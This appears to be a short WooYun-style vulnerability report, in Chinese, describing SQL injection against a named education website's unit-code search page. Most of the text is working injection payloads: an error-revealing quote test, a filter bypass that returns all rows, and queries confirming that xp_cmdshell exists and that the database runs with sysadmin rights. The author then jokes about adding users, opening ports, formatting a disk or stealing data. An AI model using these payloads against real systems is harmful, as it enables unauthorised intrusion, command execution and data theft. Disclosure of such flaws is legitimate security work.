WooYun.org

问题页面：http://www.csh.edu.cn/unitCode.action
首先，我想看看他怎样处理错误、处理各种特殊符号。
于是输入：'or 1=1#

暴露各种。看见这个
[select count(0) from unitCode where 1=1 and XXJGMC like '%'or 1=1#%']还有com.microsoft.sqlserver.jdbc.SQLServerException
知道怎么做了么？
于是随便来了： %' or 1 = 1 --
结果跟想象一样，可以查出所有。
既然是sql server，瞬间想到xp_cmdshell,不知道这个管理员是否细心，是否没有分配各种权限直接用的sa，于是构造以下：
1%' or 1 = 1 and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') --
然后FF浏览器抓了个包，响应数据和之前一样，代表存在xp_cmdshell
顺便看看权限，于是构造以下：
1%' or 1 = 1 and 1=(select IS_SRVROLEMEMBER('sysadmin')) --
结果还是一样，代表权限大大的:-)
可是接下来该干什么叻。。。
增加个用户？然后打开某个端口？（不好吧！）
来个格式化某盘？（太邪恶）
偷点数据？（这本来就是可以查数据的一个网站）
...
（略N）